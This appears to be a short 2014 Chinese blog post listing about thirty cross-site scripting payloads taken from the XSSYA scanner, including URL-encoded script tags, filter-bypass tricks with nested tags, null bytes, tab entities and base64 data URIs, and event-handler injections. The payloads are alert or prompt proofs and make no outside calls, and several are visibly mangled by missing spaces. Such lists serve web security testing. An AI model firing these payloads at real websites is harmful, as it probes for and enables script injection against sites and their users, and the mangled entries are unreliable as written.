xss payload

zhuangnet 2014-11-15

1.代码来自xssya.py

http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip

"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",

"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",

"<script>alert('xssya')</script>",

"'';!--\"<XSS>=&{()}",

"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"

"<scr<script>ipt>alert(1)</scr<script>ipt>",

"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",

"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",

"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",

"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",

"<iframesrc=\"javascript:alert(2)\">",

"<iframe/src=\"data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",

"<formaction=\"Javascript:alert(1)\"><inputtype=submit>",

"<isindexaction=data:text/html,type=image>",

"<objectdata=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",

"<svg/onload=prompt(1);>",

"<marquee/onstart=confirm(2)>/",

"<bodyonload=prompt(1);>",

"<q/oncut=open()>",

"<aonmouseover=location=’javascript:alert(1)>click",

"<svg><script>alert&#40/1/&#41</script>",

"&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;",

"<scri%00pt>alert(1);</scri%00pt>",

"<scri%00pt>confirm(0);</scri%00pt>",

"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",

"<isindexaction=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)type=image>",

"<marquee/onstart=confirm(2)>",

"<AHREF=\"http://www.google.com./\">XSS</A>",

"<svg/onload=prompt(1);>"

相关推荐